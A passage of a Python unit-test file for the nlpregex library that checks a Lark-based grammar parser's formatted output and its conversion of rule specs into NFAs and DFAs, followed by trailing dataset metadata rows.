spec01 = '<nt01>:t02 [token01] ((t03 [token02])+)[token03];'
spec_expected = 't02 [ token01 ] ( ( t03 [ token02 ] )+ ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0018f(self):
spec01 = '<nt01>:[token05](t02 [token01] ((t03 [token02])+)[token03])[token04];'
spec_expected = '[ token05 ] ( t02 [ token01 ] ( ( t03 [ token02 ] )+ ) [ token03 ] ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0019(self):
spec01 = '<nt01>:(t02 t03)+;'
spec_expected = '( t02 t03 )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0019b(self):
spec01 = '<nt01>:(t02 [token01] t03)+;'
spec_expected = '( t02 [ token01 ] t03 )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0019c(self):
spec01 = '<nt01>:(t02 t03 [token01])+;'
spec_expected = '( t02 t03 [ token01 ] )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0019d(self):
spec01 = '<nt01>:(t02 [token01] t03 [token02])+;'
spec_expected = '( t02 [ token01 ] t03 [ token02 ] )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0019e(self):
spec01 = '<nt01>:[token04]( (t02 [token01] t03 [token02])+)[token03] ;'
spec_expected = '[ token04 ] ( ( t02 [ token01 ] t03 [ token02 ] )+ ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL
#
def test_rules_0001(self):
spec01 = '<nt01>:t02;'
spec_expected = 't02'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL PLUS
#
def test_rules_0002(self):
spec01 = '<nt01>:t02+;'
spec_expected = 't02+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL STAR
#
def test_rules_0003(self):
spec01 = '<nt01>:t02*;'
spec_expected = 't02*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL QUESTION
#
def test_rules_0004(self):
spec01 = '<nt01>:t02?;'
spec_expected = 't02?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL finite_repeat
def test_rules_0005(self):
spec01 = '<nt01>:t02{3,7};'
spec_expected = 't02{ 3, 7 }'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
ast01.replace_finite_repeat_with_union()
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL out_token
def test_rules_0006(self):
spec01 = '<nt01>:t02 [token01];'
spec_expected = 't02 [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> NONTERMINAL
def test_rules_0007(self):
spec01 = '<nt01>:<nt02>;'
spec_expected = '<nt02>'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> NONTERMINAL PLUS
def test_rules_0008(self):
spec01 = '<nt01>:<nt02>+;'
spec_expected = '<nt02>+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> NONTERMINAL STAR
def test_rules_0009(self):
spec01 = '<nt01>:<nt02>*;'
spec_expected = '<nt02>*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> NONTERMINAL QUESTION
def test_rules_0010(self):
spec01 = '<nt01>:<nt02>?;'
spec_expected = '<nt02>?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> NONTERMINAL finite_repeat
def test_rules_0011(self):
spec01 = '<nt01>:<nt02>{6,11};'
spec_expected = '<nt02>{ 6, 11 }'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
ast01.replace_finite_repeat_with_union()
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> NONTERMINAL out_token
def test_rules_0012(self):
spec01 = '<nt01>:<nt02>[token01];'
spec_expected = '<nt02> [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> PAREN_L expression PAREN_R
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0013(self):
spec01 = '<nt01>:( t01 t02 );'
spec_expected = 't01 t02'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> PAREN_L expression PAREN_R PLUS
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0014(self):
spec01 = '<nt01>:( t01 t02 )+;'
spec_expected = '( t01 t02 )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> PAREN_L expression PAREN_R STAR
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0015(self):
spec01 = '<nt01>:( t01 t02 )*;'
spec_expected = '( t01 t02 )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> PAREN_L expression PAREN_R QUESTION
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0016(self):
spec01 = '<nt01>:( t01 t02 )?;'
spec_expected = '( t01 t02 )?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> PAREN_L expression PAREN_R finite_repeat
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0017(self):
spec01 = '<nt01>:( t01 t02 ){3,6};'
spec_expected = '( t01 t02 ){ 3, 6 }'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
ast01.replace_finite_repeat_with_union()
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> PAREN_L expression PAREN_R out_token
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0018(self):
spec01 = '<nt01>:( t01 t02 )[token01];'
spec_expected = '( t01 t02 ) [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> out_token PAREN_L expression PAREN_R out_token
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0019(self):
spec01 = '<nt01>:[token01]( t01 t02 )[token02];'
spec_expected = '[ token01 ] ( t01 t02 ) [ token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0020(self):
spec01 = '<nt01>:t01 t02;'
spec_expected = 't01 t02'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors PIPE expression
# factors -> factor
# factor -> TERMINAL
# factors -> factor
# expression -> factors
# factors -> factor
# factor -> TERMINAL
def test_rules_0021(self):
spec01 = '<nt01>:t01 | t02;'
spec_expected = '( t01 | t02 )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule rules
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL
def test_rules_0022(self):
spec01 = '''
<nt01>:t03;
<nt03>:t04;
'''
spec_expected_01 = 't03'
spec_expected_02 = 't04'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
ast02 = ASTs['<nt03>']
str01 = ast01.emit_formatted_text(80, 4, True)
str02 = ast02.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected_01 )
self.assertEqual( str02, spec_expected_02 )
# ast01.draw('tmp1', True, 'pdf' )
# ast02.draw('tmp2', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp1', show_out_token = True, view_now = True, out_format = "pdf" )
# fst02 = ast02.generate_fst(True)
# fst02.draw('tmp2', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> expression
# expression -> factors
# factors -> factor
# factor -> TERMINAL
def test_lines_0001(self):
spec01 = '''
t01
'''
spec_expected = 't01'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> expression
# expression -> factors
# factors -> factor
# factor -> TERMINAL
def test_lines_0002(self):
spec01 = '''
t01 t02
'''
spec_expected = 't01 t02'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> expression
# expression -> factors
# factors -> factor
# factor -> TERMINAL
def test_lines_0003(self):
spec01 = '''
t01
t02
t03
'''
spec_expected = '( t01 | t02 | t03 )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> expression
# expression -> factors
# factors -> factor
# factor -> TERMINAL
def test_lines_0004(self):
spec01 = '''
t01 t02
t03 t04
t05 t06
'''
spec_expected = '( t01 t02 | t03 t04 | t05 t06 )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0005(self):
spec01 = '''
t01 [token01] t02[token02]
'''
spec_expected = 't01 [ token01 ] t02 [ token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0006(self):
spec01 = '''
[token03]( t01 [token01] t02[token02] ) [token04]
'''
spec_expected = '[ token03 ] ( t01 [ token01 ] t02 [ token02 ] ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0007(self):
spec01 = '''
[token03]( t01 [token01] | t02[token02] ) [token04]
'''
spec_expected = '[ token03 ] ( t01 [ token01 ] | t02 [ token02 ] ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0008(self):
spec01 = '''
[token03]( t01 [token01] | t02* ) [token04]
'''
spec_expected = '[ token03 ] ( t01 [ token01 ] | t02* ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0009(self):
spec01 = '''
( t01 | t02 | <nt02> )+
'''
spec_expected = '( t01 | t02 | <nt02> )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
# print (str01)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0010(self):
spec01 = '''
( t01 t02 <nt02> )+
'''
spec_expected = '( t01 t02 <nt02> )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
# print (str01)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0011(self):
spec01 = '''
( T01 [ token03 token04 ] )
( N01 [ token03 token04 ] )
( [ token02 token01 ] ( T01 ) [ token03 token04 ] )
( T01 [ token03 token04 ] )
( [ token02 token01 ] ( ( T01 [ token07 token08 ] ) ) [ token03 token04 ] )
( [ token02 token01 ] ( ( T01 [ token07 token08 ] ) ( N02 [ token11 token12 ] ) ) [ token03 token04 ] )
( [ token02 token01 ] ( T01 [ token07 token08 ] ) [ token03 token04 ] )
( [ token02 token01 ] ( T02 [ token11 token12 ] ) [ token03 token04 ] )
( __EPS__ [ token03 token04 ] )
( [ token02 token01 ] ( T01 [ token07 token08 ] ) [ token03 token04 ] )
( [ token02 token01 ] ( T01{ 0, 3 } ) [ token03 token04 ] )
( [ token02 token01 ] ( T01{ 2, 7 } ) [ token03 token04 ] )
( [ token02 token01 ] ( ( T01 [ token07 token08 ] ){ 0, 3 } ) [ token03 token04 ] )
( [ token02 token01 ] ( ( T01 [ token07 token08 ] ){ 2, 7 } ) [ token03 token04 ] )
( [ token02 token01 ] ( T01* ) [ token03 token04 ] )
( [ token02 token01 ] ( ( T01 [ token07 token08 ] )* ) [ token03 token04 ] )
( [ token02 token01 ] ( T01+ ) [ token03 token04 ] )
( [ token02 token01 ] ( ( T01 [ token07 token08 ] )+ ) [ token03 token04 ] )
'''
spec_expected = '( t01 t02 <nt02> )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
# self.assertEqual( str01, spec_expected )
# ast01.draw('tmp_ast', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('tmp_fst', show_out_token = True, view_now = True, out_format = "pdf" )
fst01 = ast01.generate_fst(True)
dfa01 = DFA_from_NFA(fst01)
# dfa01.draw('tmp_fst', show_out_token = True, view_now = True, out_format = "pdf" )
if __name__ == '__main__':
unittest.main()
| 43.009906
| 164
| 0.532172
| 9,705
| 91,181
| 4.780113
| 0.02102
| 0.056908
| 0.054321
| 0.072428
| 0.966869
| 0.958764
| 0.953482
| 0.943825
| 0.935871
| 0.93115
| 0
| 0.093733
| 0.345708
| 91,181
| 2,119
| 165
| 43.030203
| 0.68387
| 0.413748
| 0
| 0.709333
| 0
| 0.006222
| 0.157161
| 0.01115
| 0
| 0
| 0
| 0
| 0.097778
| 1
| 0.098667
| false
| 0
| 0.002667
| 0
| 0.102222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d21d568a72cdb7a7ca7013826560d1272ef478cd
| 3,605
|
py
|
Python
|
python_modules/dagster/dagster_tests/core_tests/runtime_types_tests/test_python_set.py
|
pseudoPixels/dagster
|
